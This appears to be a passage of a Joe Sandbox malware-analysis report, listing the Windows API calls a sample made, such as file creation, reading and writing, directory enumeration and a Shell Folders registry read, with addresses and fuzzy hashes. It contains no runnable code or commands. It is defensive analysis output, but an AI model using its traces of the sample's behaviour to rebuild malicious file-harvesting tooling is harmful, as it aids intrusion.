                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3655998216-0
                                                                                                                                                                                                                                    • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1828521557-0
                                                                                                                                                                                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 609303285-0
                                                                                                                                                                                                                                    • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                                                                                                    • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
